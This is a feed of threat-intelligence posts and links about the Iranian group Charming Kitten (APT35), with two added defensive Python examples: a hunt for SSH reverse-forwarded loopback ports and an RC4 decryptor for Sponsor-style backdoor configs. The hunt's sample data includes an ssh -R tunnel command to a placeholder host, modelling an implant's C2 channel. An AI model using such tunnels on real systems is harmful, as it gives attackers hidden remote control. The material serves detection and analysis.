How a hacking campaign targeted high-profile Gmail and WhatsApp users across the Middle East
#CharmingKitten #WhatsApp
https://techcrunch.com/2026/01/16/how-a-hacking-campaign-targeted-high-profile-gmail-and-whatsapp-users-across-the-middle-east/
APT35 Leak: From cyber espionage to physical assassination plans
#apt35 #CharmingKitten #İran #nationstate
https://webrecord.media/apt35-sizintisi-siber-casusluktan-fiziksel-suikast-planlarina/
0-day browser RCE by Charming Kitten / APT35, or bad reporting?
Supposedly a link was clicked and that™ infected the computer.
Hannah Neumann chairs the Iran delegation in the EU Parliament. She fights for democracy. Now she has been targeted by a hacker attack. That is a direct attack on our values. Whoever stays silent becomes complicit. #Iran #Demokratie #EUParlament #CharmingKitten #EinfacheSprache
Iran does not attack only its own people. Now EU politicians too. The hacker group "Charming Kitten" wanted to spy on Hannah Neumann. Why? Because she stands up for freedom and human rights. Whoever acts like this shows how dangerous dictatorships are. #Iran #CharmingKitten #Neumann #EU #EinfacheSprache
BellaCiao, BellaCiao from the magic hound to the poor sod whose account is browned the magic that with the new year comes spies and hounds and hides its crumbs whether social media or email links do not click if it blinks or stinks thehackernews.com/2024/12/iran... #apt35 #charmingkitten #magichound
New APT insight from Proofpoint ⬇️
This week, our team observed IRGC/Iranian-aligned threat group #TA453 continue their phishing efforts despite the recent unsealing of indictments and sanctions by the U.S. government.
Specifically, Proofpoint observed TA453 masquerade as the Centre for Feminist Foreign Policy (CFFP) to target individuals associated with U.S. based universities, media companies, and politically adjacent social benefit organizations.
Today #CISA and the @FBI released a resource guide titled, “How to Protect Against Iranian Targeting of Accounts Associated with National Political Organizations.” It sets a good baseline on ways to protect against a variety of threat actors, including TA453. https://www.cisa.gov/resources-tools/resources/how-protect-against-iranian-targeting-accounts-associated-national-political-organizations
TA453 overlaps with reporting on #CharmingKitten, #MintSandstorm, #CharmingCypress and #APT42.
See our recent blog post to learn more about TA453’s malware evolution. https://ow.ly/OrXE50THoKZ
Iranian Cyber Actors Targeting Personal Accounts to Support Operations
#CharmingKitten
https://www.ic3.gov/Media/News/2024/240927.pdf
The Iran-aligned threat actor who compromised the Trump campaign's email systems is known in the cybersecurity research community as #TA453, #APT42, or #CharmingKitten.
"The group's appearance in the U.S. election is noteworthy, sources told @Reuters, because of their invasive #espionage approach against high-value targets in Washington and Israel."
Read the article for insights from Joshua Miller of Proofpoint and other experts: https://www.reuters.com/world/trump-campaigns-iranian-hackers-have-dangerous-history-deep-expertise-2024-08-23/
Cyclops: a likely replacement for BellaCiao
#CharmingKitten #BellaCiao #Cyclops
https://harfanglab.io/insidethelab/cyclops-replacement-bellaciao/
Our team just released a report on #CharmingKitten/#APT35: https://harfanglab.io/insidethelab/cyclops-replacement-bellaciao/
We discovered a new malware family called Cyclops, written in Go. It launches a local web server which exposes a REST API used to control the malware. The port is forwarded to the C2 via SSH.
We believe Cyclops was developed as a replacement for the (burnt) BellaCiao implant.
There seem to be very few samples in existence and we'd be curious to know if anyone else can find some. Suspected area of activity is the Middle-East since December 2023.
Reverse-engineering was a challenge due to the malware expecting marshalled objects from the network. How do you figure out their expected structure with Golang when there's no constructor? If there's any interest, I may write a separate blog post or thread on the subject.
IOCs and more in the full post. Enjoy!
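The post above describes Cyclops exposing a local REST API and forwarding that port to the C2 over SSH. The hunt below is an added example, not HarfangLab's code or the report's IOCs: it assumes the implant spawns an OpenSSH client with `-R` to publish its loopback port on the remote host (an assumption about how the forwarding is set up), and that EDR-style process-creation and listening-socket telemetry is available as plain dicts. All sample events are constructed; the IP is from the documentation range.

```python
"""Hunt for a loopback service exposed to a remote host via SSH reverse port forwarding.

Added example, not from the HarfangLab report. Assumes `ssh -R` is how the
implant publishes its local REST port (assumption) and that telemetry arrives
as dicts like the constructed samples below.
"""
import re
import shlex

# OpenSSH remote forward syntax: -R [bind_address:]port:host:hostport
_RFWD = re.compile(r"^(?:(?P<bind>[^:]*):)?(?P<rport>\d+):(?P<lhost>[^:]+):(?P<lport>\d+)$")
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def _basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def parse_remote_forwards(cmdline):
    """Return [(remote_port, local_host, local_port)] for every -R on an ssh command line."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes intact
    if not argv or not _basename(argv[0]).startswith("ssh"):
        return []
    specs, i = [], 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-R" and i + 1 < len(argv):   # "-R spec"
            specs.append(argv[i + 1])
            i += 1
        elif arg.startswith("-R") and len(arg) > 2:  # "-Rspec"
            specs.append(arg[2:])
        i += 1
    forwards = []
    for spec in specs:
        m = _RFWD.match(spec)
        if m:
            forwards.append((int(m["rport"]), m["lhost"], int(m["lport"])))
    return forwards


def hunt_reverse_forwards(process_events, listeners):
    """Correlate ssh -R forwards aimed at loopback with the process listening on that port."""
    by_pid = {e["pid"]: e for e in process_events}
    port_owner = {l["port"]: l["pid"] for l in listeners}
    findings = []
    for ev in process_events:
        for rport, lhost, lport in parse_remote_forwards(ev["cmdline"]):
            if lhost not in LOOPBACK:
                continue
            owner_pid = port_owner.get(lport)
            owner = by_pid.get(owner_pid, {})
            findings.append({
                "ssh_pid": ev["pid"],
                "remote_port": rport,
                "local_port": lport,
                "owner_pid": owner_pid,
                "owner_image": owner.get("image"),
                # strongest signal: the listener's own process spawned the ssh client
                "self_published": owner_pid is not None and owner_pid == ev["ppid"],
            })
    return findings


# Constructed telemetry (not real IOCs).
SAMPLE_PROCESSES = [
    {"pid": 1200, "ppid": 800, "image": r"C:\Users\alice\AppData\Roaming\svc\svchost32.exe",
     "cmdline": "svchost32.exe"},
    {"pid": 1210, "ppid": 1200, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe -N -o StrictHostKeyChecking=no -R 8443:127.0.0.1:8080 -i C:\ProgramData\svc\id_key svc@203.0.113.10"},
    {"pid": 1300, "ppid": 700, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -L 5432:db.internal:5432 dev@10.0.0.5"},  # benign local forward
]
SAMPLE_LISTENERS = [
    {"pid": 1200, "addr": "127.0.0.1", "port": 8080},
    {"pid": 4, "addr": "0.0.0.0", "port": 445},
]

if __name__ == "__main__":
    for f in hunt_reverse_forwards(SAMPLE_PROCESSES, SAMPLE_LISTENERS):
        print(f)
```

Only the `-R` chain whose destination is loopback and whose port is owned by the ssh client's parent is reported; a developer's `-L` tunnel produces nothing. On a real fleet, pivot from `owner_image` to the file and its persistence rather than alerting on ssh alone.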
📬 The silent danger: How APT groups infiltrate companies
#Datenschutz #ITSicherheit #AdvancedPersistentThreats #APTGruppe #CharmingKitten #FancyBear #Lazarus #SolarWinds https://sc.tarnkappe.info/db4898
Happy Thursday everyone!
The Volexity team share their findings from a recent incident that involved the APT known as #CharmingKitten (aka #CharmingCypress) and what lengths this group went to make their attack look as convincing as possible. The Volexity team also shared technical details about the malware that was used, specific commands seen, and TTPs used. Enjoy and Happy Hunting!
CharmingCypress: Innovating Persistence
https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/
As always, I don't want to leave you empty-handed! So take this Community Hunt Package from Cyborg Security to help you identify discovery behavior from adversaries!
Excessive Windows Discovery and Execution Processes - Potential Malware Installation
https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/
#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting
"🌪️ Mint Sandstorm: Sophisticated Phishing Campaign Unleashed by APT35 🚨"
Microsoft's security blog reveals an intricate phishing campaign, "Mint Sandstorm," by the subgroup PHOSPHORUS (also known as APT35 and Charming Kitten), linked to Iran's Islamic Revolutionary Guard Corps. This campaign targets individuals in universities and research organizations involved in Middle Eastern affairs across various countries. Unique tactics include bespoke phishing lures, using compromised legitimate email accounts, and deploying custom backdoors like MediaPl and MischiefTut. These tools allow for encrypted communications, reconnaissance, and persistence in target environments. Microsoft suggests using Attack Simulator in Defender for Office 365, enabling SmartScreen on browsers, and activating cloud-delivered protection to mitigate risks.
Tags: #CyberSecurity #Phishing #APT35 #CharmingKitten #MintSandstorm #MicrosoftSecurity #InfoSec #ThreatIntelligence
Iran's #CharmingKitten Pounces on Israeli #Exchange Servers
https://www.darkreading.com/dr-global/irans-charming-kitten-israeli-exchange-servers
"🔍 Charming Kitten Strikes with 'Sponsor' Malware! 🕵️"
The notorious APT group 'Charming Kitten' (also known as Phosphorus, TA453, APT35/42) has unveiled a new backdoor malware named 'Sponsor'. This malware has already targeted 34 global companies. Stay vigilant! 🌍🔥
A nation-state threat actor, known by various aliases including 'Charming Kitten,' 'Phosphorus,' 'TA453,' and 'APT35/42,' has recently executed a sophisticated cyber campaign using a previously undisclosed backdoor malware named 'Sponsor.' ESET researchers have identified this campaign, which targeted 34 companies worldwide between March 2021 and June 2022, encompassing government and healthcare organizations, financial services, engineering, manufacturing, technology, law, telecommunications, and more. The primary targets were located in Israel, Brazil, and the United Arab Emirates.
Key Findings:
Concealed Configuration Files: The 'Sponsor' backdoor is notable for its ability to hide configuration files on the victim's system, making it stealthy and difficult to detect. These files are deployed discreetly through malicious batch scripts.
Initial Access via Microsoft Exchange Vulnerability: The threat actor primarily exploited the CVE-2021-26855 vulnerability in Microsoft Exchange to gain initial access to targeted networks.
Tool Usage: Charming Kitten utilized various open-source tools for data exfiltration, system monitoring, network infiltration, and maintaining access to compromised computers.
Payload Deployment: Prior to deploying the 'Sponsor' backdoor, the attackers dropped batch files on specific file paths, creating seemingly innocuous files named config.txt, node.txt, and error.txt to avoid arousing suspicion.
Functionality of 'Sponsor' Backdoor: 'Sponsor' is a C++ backdoor that establishes a service upon launch based on instructions from the configuration file. The configuration file contains encrypted command and control (C2) server addresses, C2 contacting intervals, and the RC4 decryption key. The malware collects system information and sends it to the C2, receiving a unique node ID in return. It then enters a loop to receive and execute commands from the C2, including process ID reporting, command execution, file retrieval and execution, and more.
Disguised Second Version: ESET identified a second version of 'Sponsor' with code optimizations and camouflage features, making it appear as an updater tool.
Indicators of Compromise (IOCs): Although the IP addresses used in this campaign are no longer active, ESET has shared comprehensive IOCs to assist in defending against potential future threats that may reuse the tools or infrastructure deployed by Charming Kitten.
Organizations worldwide, particularly those in the targeted sectors and regions, should remain vigilant and ensure their cybersecurity defenses are up-to-date and capable of detecting advanced threats like 'Sponsor' used by nation-state actors like Charming Kitten. Regular patching and network monitoring are essential to mitigate such cyber risks.
Source: BleepingComputer.com
Mitre - Charming Kitten
Tags: #APT #CharmingKitten #SponsorMalware #CyberAttack
Sponsor, written in C++, is designed to gather crucial information from the compromised host and execute instructions received from the attackers’ remote server.
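The two Sponsor write-ups above say the configuration file carries the C2 addresses and contact interval RC4-encrypted together with the RC4 key. As an added example, not ESET's analysis code or the malware's own format, the block below implements RC4 and decrypts a config in a hypothetical layout (one `key=`, `c2=` and `interval=` line, values hex-encoded); the real Sponsor layout is not described in these posts. Sample values are constructed with documentation-range IPs.

```python
"""Decrypt a Sponsor-style backdoor configuration file.

Added example, not ESET's or the malware's code. RC4 is the standard stream
cipher; the key/c2/interval line layout is a hypothetical stand-in for the real
format. Sample C2 addresses are constructed from documentation ranges.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_config(key: bytes, c2s, interval_s: int) -> str:
    """Write the hypothetical layout; used here only to construct a sample for analysis."""
    enc = lambda s: rc4(key, s.encode()).hex()
    return "\n".join([
        f"key={key.hex()}",
        f"c2={enc(','.join(c2s))}",
        f"interval={enc(str(interval_s))}",
    ]) + "\n"


def parse_config(text: str) -> dict:
    """Recover C2 list and beacon interval from a config that ships its own RC4 key."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or "=" not in line:
            continue
        k, v = line.split("=", 1)
        fields[k.strip().lower()] = bytes.fromhex(v.strip())
    for required in ("key", "c2", "interval"):
        if required not in fields:
            raise ValueError(f"config missing {required}=")
    key = fields["key"]
    return {
        "c2": [h for h in rc4(key, fields["c2"]).decode().split(",") if h],
        "interval": int(rc4(key, fields["interval"]).decode()),
    }


if __name__ == "__main__":
    # Constructed sample: key and C2s are not real indicators.
    sample = build_config(bytes.fromhex("0f1e2d3c4b5a6978"),
                          ["203.0.113.10:443", "198.51.100.7:8443"], 300)
    print(sample)
    print(parse_config(sample))
```

Because the key sits in the same file as the ciphertext, an analyst with the dropped config can recover the C2 list directly and turn it into network blocks, which is why the encryption here is obfuscation rather than protection.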
📬 Espionage on the internet: Verfassungsschutz warns about Charming Kitten
#Cyberangriffe #Geheimdienste #Bundesverfassungsschutz #CharmingKitten #CyberSpionage #Cyberabwehr #DrMansourSohrabi #Iran #JadranMesic #MikeHart https://tarnkappe.info/artikel/cyberangriff/spionage-im-internet-verfassungsschutz-warnt-vor-charming-kitten-279835.html
Verfassungsschutz: Iranian hackers want to spy on regime critics in Germany | heise online https://www.heise.de/news/Verfassungsschutz-Iranische-Hacker-wollen-Regimekritiker-hierzulande-ausspaehen-9240674.html #Phishing #CyberCrime #Hacking #SocialEngineering #Iran 🇮🇷 #CharmingKitten
According to the findings of the Federal Office for the Protection of the Constitution (#Verfassungsschutz, #BfV), concrete spying attempts by the #APT group #CharmingKitten against Iranian individuals and organizations in Germany must be assumed since the end of 2022.
In particular, in its "Cyber-Brief Nr. 01/2023" of 10 August 2023 the BfV warns of #Phishing attacks against dissident (#Dissidenten) organizations and individuals, such as lawyers, journalists or human rights activists (#Menschenrechtsaktivisten), inside and outside #Iran.